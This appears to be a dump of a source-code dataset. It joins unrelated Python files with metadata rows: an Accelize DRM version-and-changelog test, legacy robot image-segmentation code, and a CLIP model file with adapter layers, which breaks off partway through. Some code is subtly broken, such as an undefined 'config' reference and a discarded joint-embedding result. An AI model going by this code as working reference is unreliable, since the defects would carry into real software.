import pytest
from tests.conftest import perform_once
def test_changelog_and_version(accelize_drm):
perform_once(__name__ + '.test_changelog_and_version')
from os.path import join
from subprocess import run, PIPE
from re import fullmatch
if not accelize_drm.pytest_build_environment:
pytest.skip("Can only be checked in build environment")
try:
run(['git', 'fetch', '--tags', '--force'],
stderr=PIPE, stdout=PIPE, universal_newlines=True)
except FileNotFoundError:
fail = (
pytest.fail if accelize_drm.pytest_build_type == 'debug' else
pytest.xfail)
fail('Git is required for this test.')
result = run(['git', 'describe', '--abbrev=0', '--exact-match', '--tags',
'HEAD'], stderr=PIPE, stdout=PIPE, universal_newlines=True)
if result.returncode:
pytest.skip("Can only be checked on tagged git head")
tag = result.stdout.strip()
version = tag.lstrip('v')
lib_ver = accelize_drm.get_api_version()
assert tag == 'v%s' % (lib_ver.version.split('+')[0])
if not fullmatch(r'^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)'
r'(-(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)'
r'(\.(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*)?'
r'(\+[0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*)?$', version):
pytest.fail('"%s" does not match semantic versioning format.' % version)
if not lib_ver.prerelease:
changelog_path = join(accelize_drm.pytest_build_source_dir, 'CHANGELOG')
with open(changelog_path, 'rt') as changelog:
last_change = changelog.readline().strip()
assert fullmatch(
r"\* [a-zA-Z]{3} [a-zA-Z]{3} [0-9]{2} [0-9]{4} Accelize " + tag,
last_change)
else:
assert fullmatch(r"(alpha|beta|rc)\.[0-9]+", lib_ver.prerelease)
| true
| true
|
1c40e745045a2c4157f067beefee2f2f2323a0a4
| 5,428
|
py
|
Python
|
legacy_code/double_raster_segmentation.py
|
alvinshi/Mobot_2018
|
2be14a771bc184bf92beb87b0ae4fd4d5deb36b2
|
[
"MIT"
] | null | null | null |
legacy_code/double_raster_segmentation.py
|
alvinshi/Mobot_2018
|
2be14a771bc184bf92beb87b0ae4fd4d5deb36b2
|
[
"MIT"
] | null | null | null |
legacy_code/double_raster_segmentation.py
|
alvinshi/Mobot_2018
|
2be14a771bc184bf92beb87b0ae4fd4d5deb36b2
|
[
"MIT"
] | null | null | null |
# adaptive thresholding method
def adaptive_thresholding(img):
img_grey = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
adaptive_threshed = cv2.adaptiveThreshold(img_grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 1)
cv2.imshow("adaptive", adaptive_threshed)
return adaptive_threshed
# Normalize the thresholded image to a binary image
def normalize(img):
normalizeImg = np.zeros_like(img)
normalizeImg[img == 255] = 1
return normalizeImg
def get_center(coordinates, colInterval):
SIZE_THRESHOLD = 30
index = 0
centers = []
while coordinates[index] != None:
if (len(coordinates) > SIZE_THRESHOLD):
sums = [0,0]
for i in coordinates[index]:
(row, col) = i
sums[0] = sums[0] + row
sums[1] = sums[1] + col
sums[0] = int(math.floor(sums[0] / len(coordinates[index])))
sums[1] = int(math.floor(sums[1] / len(coordinates[index]))) + colInterval
sums = switchRowCol(sums)
centers.append(tuple(sums))
index = index + 1
return centers
# Switch the row and col for the drawing function
def switchRowCol(origCoor):
col = origCoor[1]
row = origCoor[0]
return [col, row]
# add the coordinates of same label to "coordinates"
def addCoordinates(coorNum, label, labelCoor, startRow, coordinates):
for index in range(0, coorNum):
labelCoor[index][0] = labelCoor[index][0] + startRow
#labelCoorT = switchRowCol(labelCoor[index])
if coordinates[label-2] != None:
coordinates[label-2].append(labelCoor[index])
else:
coordinates[label-2] = [labelCoor[index]]
# double raster for image segmentation
# returns the center coordinates of each of the segment
def double_raster(imgTakein, startRow, colInterval):
# take in binary image; startRow is the start row of the current image slice
img = normalize(imgTakein)
cur_label=2
coordinates = [None] * 50
eq=[0] * len(img)*len(img[0])
for row in range(0,len(img)):
for col in range(0,len(img[row])):
if(img[row][col]==1):
if(row>0):
up=img[row-1][col]
else:
up=0
if(col>0):
left=img[row,col-1]
else:
left=0
if(up==0 and left==0):
img[row][col]=cur_label
cur_label=cur_label+1
elif(up!=0 and left!=0):
img[row][col]=min(up,left)
if(up!=left):
eq[max(up,left)]=min(up,left)
a=min(up,left)
while(eq[a]!=0):
eq[max(up,left)]=eq[a]
a=eq[a]
elif(up==0 or left==0):
img[row][col]=max(up,left)
# changed nested for loop of the second sweep to below, faster for 5-6 second
max_label = cur_label # record the max label number
labelPixNumber = [0] * max_label # The number of pixels in each label
coorAdded = False # switch of whether the coordinates has been recorded
for label in range(0, max_label):
labelCoor = np.argwhere(img == label) # get the coordinates of pixels with same label
coorNum = len(labelCoor)
labelPixNumber[label] = coorNum
if (eq[label] != 0):
eqLabel = eq[label]
img = eqLabel * (img == label) + img
# Add the number of pixels of the current label to the equiv label
# and set the current label pixel number to 0
labelPixNumber[eqLabel] = labelPixNumber[eqLabel] + labelPixNumber[label]
labelPixNumber[label] = 0
addCoordinates(coorNum, eqLabel, labelCoor, startRow, coordinates)
coorAdded = True
if not coorAdded:
addCoordinates(coorNum, label, labelCoor, startRow, coordinates)
coorAdded = False
centers = get_center(coordinates, colInterval)
# print("finished double raster for one slice of image")
return centers
# Returns 1. Segment centors (including two different paths)
# 2. bool path diverge state
def row_segment_center(img, NUM_SEGS, colInterval):
global doubleRasterTime
# Segment the original image into 20 segments
numSegs = NUM_SEGS
numRows = img.shape[0]
numCols = img.shape[1]
rowInterval = numRows/numSegs
segmentCenters = [None] * numSegs
blockCenters = []
startRow = 0
for i in range(0, numSegs):
imgSeg = img[startRow:startRow+rowInterval, 0:numCols]
# Threshold imageSegments and calculate the centor of each segments
coor = np.argwhere(imgSeg == 255)
if len(coor) == 0:
rmean = img.shape[0]/2
cmean = img.shape[1]/2
else:
rmean=int(math.floor(np.mean(coor[:,0])))
cmean=int(math.floor(np.mean(coor[:,1])))
segmentCenters[i] = (cmean+colInterval, startRow+rmean)
startRow = startRow + rowInterval # update row
doubleRasterStart = time.time()
blockCenters.append(double_raster(imgSeg, startRow, colInterval))
doubleRasterEnd = time.time()
doubleRasterTime += doubleRasterEnd - doubleRasterStart
return segmentCenters, blockCenters
| 39.333333
| 122
| 0.595431
|
def adaptive_thresholding(img):
img_grey = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
adaptive_threshed = cv2.adaptiveThreshold(img_grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 1)
cv2.imshow("adaptive", adaptive_threshed)
return adaptive_threshed
def normalize(img):
normalizeImg = np.zeros_like(img)
normalizeImg[img == 255] = 1
return normalizeImg
def get_center(coordinates, colInterval):
SIZE_THRESHOLD = 30
index = 0
centers = []
while coordinates[index] != None:
if (len(coordinates) > SIZE_THRESHOLD):
sums = [0,0]
for i in coordinates[index]:
(row, col) = i
sums[0] = sums[0] + row
sums[1] = sums[1] + col
sums[0] = int(math.floor(sums[0] / len(coordinates[index])))
sums[1] = int(math.floor(sums[1] / len(coordinates[index]))) + colInterval
sums = switchRowCol(sums)
centers.append(tuple(sums))
index = index + 1
return centers
def switchRowCol(origCoor):
col = origCoor[1]
row = origCoor[0]
return [col, row]
def addCoordinates(coorNum, label, labelCoor, startRow, coordinates):
for index in range(0, coorNum):
labelCoor[index][0] = labelCoor[index][0] + startRow
if coordinates[label-2] != None:
coordinates[label-2].append(labelCoor[index])
else:
coordinates[label-2] = [labelCoor[index]]
def double_raster(imgTakein, startRow, colInterval):
img = normalize(imgTakein)
cur_label=2
coordinates = [None] * 50
eq=[0] * len(img)*len(img[0])
for row in range(0,len(img)):
for col in range(0,len(img[row])):
if(img[row][col]==1):
if(row>0):
up=img[row-1][col]
else:
up=0
if(col>0):
left=img[row,col-1]
else:
left=0
if(up==0 and left==0):
img[row][col]=cur_label
cur_label=cur_label+1
elif(up!=0 and left!=0):
img[row][col]=min(up,left)
if(up!=left):
eq[max(up,left)]=min(up,left)
a=min(up,left)
while(eq[a]!=0):
eq[max(up,left)]=eq[a]
a=eq[a]
elif(up==0 or left==0):
img[row][col]=max(up,left)
max_label = cur_label
labelPixNumber = [0] * max_label
coorAdded = False
for label in range(0, max_label):
labelCoor = np.argwhere(img == label)
coorNum = len(labelCoor)
labelPixNumber[label] = coorNum
if (eq[label] != 0):
eqLabel = eq[label]
img = eqLabel * (img == label) + img
labelPixNumber[eqLabel] = labelPixNumber[eqLabel] + labelPixNumber[label]
labelPixNumber[label] = 0
addCoordinates(coorNum, eqLabel, labelCoor, startRow, coordinates)
coorAdded = True
if not coorAdded:
addCoordinates(coorNum, label, labelCoor, startRow, coordinates)
coorAdded = False
centers = get_center(coordinates, colInterval)
return centers
def row_segment_center(img, NUM_SEGS, colInterval):
global doubleRasterTime
numSegs = NUM_SEGS
numRows = img.shape[0]
numCols = img.shape[1]
rowInterval = numRows/numSegs
segmentCenters = [None] * numSegs
blockCenters = []
startRow = 0
for i in range(0, numSegs):
imgSeg = img[startRow:startRow+rowInterval, 0:numCols]
coor = np.argwhere(imgSeg == 255)
if len(coor) == 0:
rmean = img.shape[0]/2
cmean = img.shape[1]/2
else:
rmean=int(math.floor(np.mean(coor[:,0])))
cmean=int(math.floor(np.mean(coor[:,1])))
segmentCenters[i] = (cmean+colInterval, startRow+rmean)
startRow = startRow + rowInterval
doubleRasterStart = time.time()
blockCenters.append(double_raster(imgSeg, startRow, colInterval))
doubleRasterEnd = time.time()
doubleRasterTime += doubleRasterEnd - doubleRasterStart
return segmentCenters, blockCenters
| true
| true
|
1c40e7a65f2d0aa486c11a4dc3d2889b1385309c
| 20,991
|
py
|
Python
|
CLIP-ViL/clip/model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 41
|
2021-12-14T02:50:16.000Z
|
2022-03-30T07:41:19.000Z
|
CLIP-ViL/clip/model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 1
|
2022-01-07T03:31:47.000Z
|
2022-03-25T00:31:53.000Z
|
CLIP-ViL/clip/model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 2
|
2021-12-14T03:10:18.000Z
|
2022-03-29T04:59:23.000Z
|
from collections import OrderedDict
from typing import Tuple, Union
import torch
import torch.nn.functional as F
from torch import nn
class VisualAdapter(nn.Module):
"""Conventional Adapter layer, in which the weights of up and down sampler modules
are parameters and are optimized."""
def __init__(self, input_dim, output_dim, adapter_kind, reduction_factor=16, use_bn=True, use_gate=True):
super().__init__()
self.adapter_kind = adapter_kind
self.use_bn = use_bn
if use_gate:
self.gate = nn.Parameter(torch.zeros(1))
else:
self.gate = None
if adapter_kind == "bottleneck":
self.down_sample_size = input_dim // reduction_factor
self.activation = nn.ReLU(inplace=True)
self.down_sampler = nn.Conv2d(input_dim, self.down_sample_size, 1, bias=False)
self.up_sampler = nn.Conv2d(self.down_sample_size, output_dim, 1, bias=False)
if use_bn:
self.bn1 = nn.BatchNorm2d(self.down_sample_size)
self.bn2 = nn.BatchNorm2d(output_dim)
elif adapter_kind == "basic":
self.activation = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(input_dim, output_dim, 1, bias=False)
if use_bn:
self.bn = nn.BatchNorm2d(output_dim)
else:
raise NotImplementedError
def forward(self, x):
if self.adapter_kind == "bottleneck":
z = self.down_sampler(x)
z = self.bn1(z) if self.use_bn else z
z = self.activation(z)
output = self.up_sampler(z)
output = self.bn2(output) if self.use_bn else output
elif self.adapter_kind == "basic":
output = self.conv(x)
output = self.bn(output) if self.use_bn else output
if self.gate is not None:
output = self.gate * output
return output
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, adapter_config=None):
super().__init__()
# all conv layers have stride 1. an avgpool is performed after the second convolution when stride > 1
self.conv1 = nn.Conv2d(inplanes, planes, 1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, 3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.avgpool = nn.AvgPool2d(stride) if stride > 1 else nn.Identity()
self.conv3 = nn.Conv2d(planes, planes * self.expansion, 1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = None
self.stride = stride
self.adapter = None
if adapter_config is not None:
self.adapter = VisualAdapter(planes, planes, "basic", adapter_config.reduction_factor, True, config.use_gate)
if stride > 1 or inplanes != planes * Bottleneck.expansion:
# downsampling layer is prepended with an avgpool, and the subsequent convolution has stride 1
self.downsample = nn.Sequential(OrderedDict([
("-1", nn.AvgPool2d(stride)),
("0", nn.Conv2d(inplanes, planes * self.expansion, 1, stride=1, bias=False)),
("1", nn.BatchNorm2d(planes * self.expansion))
]))
def forward(self, x: torch.Tensor):
identity = x
out = self.relu(self.bn1(self.conv1(x)))
if self.adapter is not None:
adapter_out = self.adapter(out)
out = self.bn2(self.conv2(out))
out = self.relu(adapter_out + out)
else:
out = self.relu(self.bn2(self.conv2(out)))
out = self.avgpool(out)
out = self.bn3(self.conv3(out))
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class AttentionPool2d(nn.Module):
def __init__(self, spacial_dim: int, embed_dim: int, num_heads: int, output_dim: int = None):
super().__init__()
self.positional_embedding = nn.Parameter(torch.randn(spacial_dim ** 2 + 1, embed_dim) / embed_dim ** 0.5)
self.k_proj = nn.Linear(embed_dim, embed_dim)
self.q_proj = nn.Linear(embed_dim, embed_dim)
self.v_proj = nn.Linear(embed_dim, embed_dim)
self.c_proj = nn.Linear(embed_dim, output_dim or embed_dim)
self.num_heads = num_heads
def forward(self, x):
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3]).permute(2, 0, 1) # NCHW -> (HW)NC
x = torch.cat([x.mean(dim=0, keepdim=True), x], dim=0) # (HW+1)NC
x = x + self.positional_embedding[:, None, :].to(x.dtype) # (HW+1)NC
x, _ = F.multi_head_attention_forward(
query=x, key=x, value=x,
embed_dim_to_check=x.shape[-1],
num_heads=self.num_heads,
q_proj_weight=self.q_proj.weight,
k_proj_weight=self.k_proj.weight,
v_proj_weight=self.v_proj.weight,
in_proj_weight=None,
in_proj_bias=torch.cat([self.q_proj.bias, self.k_proj.bias, self.v_proj.bias]),
bias_k=None,
bias_v=None,
add_zero_attn=False,
dropout_p=0,
out_proj_weight=self.c_proj.weight,
out_proj_bias=self.c_proj.bias,
use_separate_proj_weight=True,
training=self.training,
need_weights=False
)
return x[0]
class ModifiedResNet(nn.Module):
"""
A ResNet class that is similar to torchvision's but contains the following changes:
- There are now 3 "stem" convolutions as opposed to 1, with an average pool instead of a max pool.
- Performs anti-aliasing strided convolutions, where an avgpool is prepended to convolutions with stride > 1
- The final pooling layer is a QKV attention instead of an average pool
"""
def __init__(self, layers, output_dim, heads, input_resolution=224, width=64, adapter_config=None):
super().__init__()
self.output_dim = output_dim
self.input_resolution = input_resolution
self.adapter_config = adapter_config
# the 3-layer stem
self.conv1 = nn.Conv2d(3, width // 2, kernel_size=3, stride=2, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(width // 2)
self.conv2 = nn.Conv2d(width // 2, width // 2, kernel_size=3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(width // 2)
self.conv3 = nn.Conv2d(width // 2, width, kernel_size=3, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(width)
self.avgpool = nn.AvgPool2d(2)
self.relu = nn.ReLU(inplace=True)
# residual layers
self._inplanes = width # this is a *mutable* variable used during construction
self.layer1 = self._make_layer(width, layers[0])
self.layer2 = self._make_layer(width * 2, layers[1], stride=2)
self.layer3 = self._make_layer(width * 4, layers[2], stride=2)
self.layer4 = self._make_layer(width * 8, layers[3], stride=2)
embed_dim = width * 32 # the ResNet feature dimension
self.attnpool = AttentionPool2d(input_resolution // 32, embed_dim, heads, output_dim)
def _make_layer(self, planes, blocks, stride=1):
layers = [Bottleneck(self._inplanes, planes, stride, adapter_config=self.adapter_config)]
self._inplanes = planes * Bottleneck.expansion
for _ in range(1, blocks):
layers.append(Bottleneck(self._inplanes, planes, adapter_config=self.adapter_config))
return nn.Sequential(*layers)
def forward(self, x, skip_last_layer=False):
def stem(x):
for conv, bn in [(self.conv1, self.bn1), (self.conv2, self.bn2), (self.conv3, self.bn3)]:
x = self.relu(bn(conv(x)))
x = self.avgpool(x)
return x
x = x.type(self.conv1.weight.dtype)
x = stem(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
if not skip_last_layer:
x = self.attnpool(x)
return x
class LayerNorm(nn.LayerNorm):
"""Subclass torch's LayerNorm to handle fp16."""
def forward(self, x: torch.Tensor):
orig_type = x.dtype
ret = super().forward(x.type(torch.float32))
return ret.type(orig_type)
class QuickGELU(nn.Module):
def forward(self, x: torch.Tensor):
return x * torch.sigmoid(1.702 * x)
class ResidualAttentionBlock(nn.Module):
def __init__(self, d_model: int, n_head: int, attn_mask: torch.Tensor = None):
super().__init__()
self.attn = nn.MultiheadAttention(d_model, n_head)
self.ln_1 = LayerNorm(d_model)
self.mlp = nn.Sequential(OrderedDict([
("c_fc", nn.Linear(d_model, d_model * 4)),
("gelu", QuickGELU()),
("c_proj", nn.Linear(d_model * 4, d_model))
]))
self.ln_2 = LayerNorm(d_model)
self.attn_mask = attn_mask
def attention(self, x: torch.Tensor, text_mask=None):
if text_mask is None:
text_mask = self.attn_mask.to(dtype=x.dtype, device=x.device) if self.attn_mask is not None else None
return self.attn(x, x, x, need_weights=False, attn_mask=text_mask)[0]
def forward(self, x: torch.Tensor, text_mask = None):
x = x + self.attention(self.ln_1(x), text_mask = text_mask)
x = x + self.mlp(self.ln_2(x))
return x
class Transformer(nn.Module):
def __init__(self, width: int, layers: int, heads: int, attn_mask: torch.Tensor = None):
super().__init__()
self.width = width
self.layers = layers
self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)])
def forward(self, x: torch.Tensor, text_mask=None):
for layer in self.resblocks:
x = layer(x, text_mask = text_mask)
return x
class VisualTransformer(nn.Module):
def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int, output_dim: int):
super().__init__()
self.input_resolution = input_resolution
self.output_dim = output_dim
self.heads = heads
self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, bias=False)
scale = width ** -0.5
self.class_embedding = nn.Parameter(scale * torch.randn(width))
self.positional_embedding = nn.Parameter(scale * torch.randn((input_resolution // patch_size) ** 2 + 1, width))
self.ln_pre = LayerNorm(width)
self.transformer = Transformer(width, layers, heads)
self.ln_post = LayerNorm(width)
self.proj = nn.Parameter(scale * torch.randn(width, output_dim))
def forward(self, x: torch.Tensor, skip_last_layer=False, text_embedding=None, text_mask=None):
x = self.conv1(x) # shape = [*, width, grid, grid]
x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid ** 2]
x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width]
x = torch.cat([self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1) # shape = [*, grid ** 2 + 1, width]
x = x + self.positional_embedding.to(x.dtype)
x = self.ln_pre(x)
x = x.permute(1, 0, 2) # NLD -> LND
if text_embedding is not None:
text_embedding = text_embedding.transpose(0, 1)
joint_embeddings = torch.cat((text_embedding, x), dim=0)
# Current language mask: batch x seq_len
text_mask = torch.cat(
(text_mask, torch.zeros(x.size(1), x.size(0)).float().to(x.device)),
dim=1)
# batch * heads x (seq_len + image_len)
text_mask = torch.cat([text_mask for i in range(self.heads)], dim=0)
# batch * heads x (seq_len + image_len) x (seq_len + image_len)
text_mask = text_mask.unsqueeze(1).expand(text_mask.size(0), text_mask.size(1), text_mask.size(1))
x = self.transformer(joint_embeddings, text_mask=text_mask)
x = self.transformer(x)
x = x.permute(1, 0, 2) # LND -> NLD
if skip_last_layer:
x = self.ln_post(x)
else:
x = x @ self.proj
return x
class CLIP(nn.Module):
def __init__(self,
embed_dim: int,
# vision
image_resolution: int,
vision_layers: Union[Tuple[int, int, int, int], int],
vision_width: int,
vision_patch_size: int,
# text
context_length: int,
vocab_size: int,
transformer_width: int,
transformer_heads: int,
transformer_layers: int,
adapter_config,
):
super().__init__()
self.context_length = context_length
if isinstance(vision_layers, (tuple, list)):
vision_heads = vision_width * 32 // 64
self.visual = ModifiedResNet(
layers=vision_layers,
output_dim=embed_dim,
heads=vision_heads,
input_resolution=image_resolution,
width=vision_width,
adapter_config=adapter_config,
)
else:
vision_heads = vision_width // 64
self.visual = VisualTransformer(
input_resolution=image_resolution,
patch_size=vision_patch_size,
width=vision_width,
layers=vision_layers,
heads=vision_heads,
output_dim=embed_dim
)
self.transformer = Transformer(
width=transformer_width,
layers=transformer_layers,
heads=transformer_heads,
attn_mask=self.build_attention_mask()
)
self.vocab_size = vocab_size
self.token_embedding = nn.Embedding(vocab_size, transformer_width)
self.positional_embedding = nn.Parameter(torch.empty(self.context_length, transformer_width))
self.ln_final = LayerNorm(transformer_width)
self.text_projection = nn.Parameter(torch.empty(transformer_width, embed_dim))
self.logit_scale = nn.Parameter(torch.ones([]))
self.initialize_parameters()
def initialize_parameters(self):
nn.init.normal_(self.token_embedding.weight, std=0.02)
nn.init.normal_(self.positional_embedding, std=0.01)
if isinstance(self.visual, ModifiedResNet):
if self.visual.attnpool is not None:
std = self.visual.attnpool.c_proj.in_features ** -0.5
nn.init.normal_(self.visual.attnpool.q_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.k_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.v_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.c_proj.weight, std=std)
for resnet_block in [self.visual.layer1, self.visual.layer2, self.visual.layer3, self.visual.layer4]:
for name, param in resnet_block.named_parameters():
if name.endswith("bn3.weight"):
nn.init.zeros_(param)
proj_std = (self.transformer.width ** -0.5) * ((2 * self.transformer.layers) ** -0.5)
attn_std = self.transformer.width ** -0.5
fc_std = (2 * self.transformer.width) ** -0.5
for block in self.transformer.resblocks:
nn.init.normal_(block.attn.in_proj_weight, std=attn_std)
nn.init.normal_(block.attn.out_proj.weight, std=proj_std)
nn.init.normal_(block.mlp.c_fc.weight, std=fc_std)
nn.init.normal_(block.mlp.c_proj.weight, std=proj_std)
if self.text_projection is not None:
nn.init.normal_(self.text_projection, std=self.transformer.width ** -0.5)
def build_attention_mask(self):
# lazily create causal attention mask, with full attention between the vision tokens
# pytorch uses additive attention mask; fill with -inf
mask = torch.empty(self.context_length, self.context_length)
mask.fill_(float("-inf"))
mask.triu_(1) # zero out the lower diagonal
return mask
@property
def dtype(self):
return self.visual.conv1.weight.dtype
def encode_image(self, image):
return self.visual(image.type(self.dtype))
def encode_text(self, text):
x = self.token_embedding(text).type(self.dtype) # [batch_size, n_ctx, d_model]
x = x + self.positional_embedding.type(self.dtype)
x = x.permute(1, 0, 2) # NLD -> LND
x = self.transformer(x)
x = x.permute(1, 0, 2) # LND -> NLD
x = self.ln_final(x).type(self.dtype)
# x.shape = [batch_size, n_ctx, transformer.width]
# take features from the eot embedding (eot_token is the highest number in each sequence)
x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection
return x
def forward(self, image, text):
image_features = self.encode_image(image)
text_features = self.encode_text(text)
# normalized features
image_features = image_features / image_features.norm(dim=-1, keepdim=True)
text_features = text_features / text_features.norm(dim=-1, keepdim=True)
# cosine similarity as logits
logit_scale = self.logit_scale.exp()
logits_per_image = logit_scale * image_features @ text_features.t()
logits_per_text = logit_scale * text_features @ image_features.t()
# shape = [global_batch_size, global_batch_size]
return logits_per_image, logits_per_text
def convert_weights(model: nn.Module):
"""Convert applicable model parameters to fp16"""
def _convert_weights_to_fp16(l):
if isinstance(l, (nn.Conv1d, nn.Conv2d, nn.Linear)):
l.weight.data = l.weight.data.half()
if l.bias is not None:
l.bias.data = l.bias.data.half()
if isinstance(l, nn.MultiheadAttention):
for attr in [*[f"{s}_proj_weight" for s in ["in", "q", "k", "v"]], "in_proj_bias", "bias_k", "bias_v"]:
tensor = getattr(l, attr)
if tensor is not None:
tensor.data = tensor.data.half()
for name in ["text_projection", "proj"]:
if hasattr(l, name):
attr = getattr(l, name)
if attr is not None:
attr.data = attr.data.half()
model.apply(_convert_weights_to_fp16)
def build_model(state_dict: dict, adapter_config):
vit = "visual.proj" in state_dict
if vit:
vision_width = state_dict["visual.conv1.weight"].shape[0]
vision_layers = len([k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = state_dict["text_projection"].shape[1]
context_length = state_dict["positional_embedding"].shape[0]
vocab_size = state_dict["token_embedding.weight"].shape[0]
transformer_width = state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith(f"transformer.resblocks")))
model = CLIP(
embed_dim,
image_resolution, vision_layers, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers,
adapter_config
)
for key in ["input_resolution", "context_length", "vocab_size"]:
del state_dict[key]
#convert_weights(model)
# model.load_state_dict(state_dict)
try:
model.load_state_dict(state_dict)
except RuntimeError as err:
print("Some keys are mismatched")
err = str(err).split("\n", 1)[1]
print(err)
model.load_state_dict(state_dict, strict=False)
return model.eval()
| 39.531073
| 178
| 0.616216
|
from collections import OrderedDict
from typing import Tuple, Union
import torch
import torch.nn.functional as F
from torch import nn
class VisualAdapter(nn.Module):
def __init__(self, input_dim, output_dim, adapter_kind, reduction_factor=16, use_bn=True, use_gate=True):
super().__init__()
self.adapter_kind = adapter_kind
self.use_bn = use_bn
if use_gate:
self.gate = nn.Parameter(torch.zeros(1))
else:
self.gate = None
if adapter_kind == "bottleneck":
self.down_sample_size = input_dim // reduction_factor
self.activation = nn.ReLU(inplace=True)
self.down_sampler = nn.Conv2d(input_dim, self.down_sample_size, 1, bias=False)
self.up_sampler = nn.Conv2d(self.down_sample_size, output_dim, 1, bias=False)
if use_bn:
self.bn1 = nn.BatchNorm2d(self.down_sample_size)
self.bn2 = nn.BatchNorm2d(output_dim)
elif adapter_kind == "basic":
self.activation = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(input_dim, output_dim, 1, bias=False)
if use_bn:
self.bn = nn.BatchNorm2d(output_dim)
else:
raise NotImplementedError
def forward(self, x):
if self.adapter_kind == "bottleneck":
z = self.down_sampler(x)
z = self.bn1(z) if self.use_bn else z
z = self.activation(z)
output = self.up_sampler(z)
output = self.bn2(output) if self.use_bn else output
elif self.adapter_kind == "basic":
output = self.conv(x)
output = self.bn(output) if self.use_bn else output
if self.gate is not None:
output = self.gate * output
return output
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, adapter_config=None):
super().__init__()
self.conv1 = nn.Conv2d(inplanes, planes, 1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, 3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.avgpool = nn.AvgPool2d(stride) if stride > 1 else nn.Identity()
self.conv3 = nn.Conv2d(planes, planes * self.expansion, 1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = None
self.stride = stride
self.adapter = None
if adapter_config is not None:
self.adapter = VisualAdapter(planes, planes, "basic", adapter_config.reduction_factor, True, config.use_gate)
if stride > 1 or inplanes != planes * Bottleneck.expansion:
self.downsample = nn.Sequential(OrderedDict([
("-1", nn.AvgPool2d(stride)),
("0", nn.Conv2d(inplanes, planes * self.expansion, 1, stride=1, bias=False)),
("1", nn.BatchNorm2d(planes * self.expansion))
]))
def forward(self, x: torch.Tensor):
identity = x
out = self.relu(self.bn1(self.conv1(x)))
if self.adapter is not None:
adapter_out = self.adapter(out)
out = self.bn2(self.conv2(out))
out = self.relu(adapter_out + out)
else:
out = self.relu(self.bn2(self.conv2(out)))
out = self.avgpool(out)
out = self.bn3(self.conv3(out))
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class AttentionPool2d(nn.Module):
def __init__(self, spacial_dim: int, embed_dim: int, num_heads: int, output_dim: int = None):
super().__init__()
self.positional_embedding = nn.Parameter(torch.randn(spacial_dim ** 2 + 1, embed_dim) / embed_dim ** 0.5)
self.k_proj = nn.Linear(embed_dim, embed_dim)
self.q_proj = nn.Linear(embed_dim, embed_dim)
self.v_proj = nn.Linear(embed_dim, embed_dim)
self.c_proj = nn.Linear(embed_dim, output_dim or embed_dim)
self.num_heads = num_heads
def forward(self, x):
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3]).permute(2, 0, 1)
x = torch.cat([x.mean(dim=0, keepdim=True), x], dim=0)
x = x + self.positional_embedding[:, None, :].to(x.dtype)
x, _ = F.multi_head_attention_forward(
query=x, key=x, value=x,
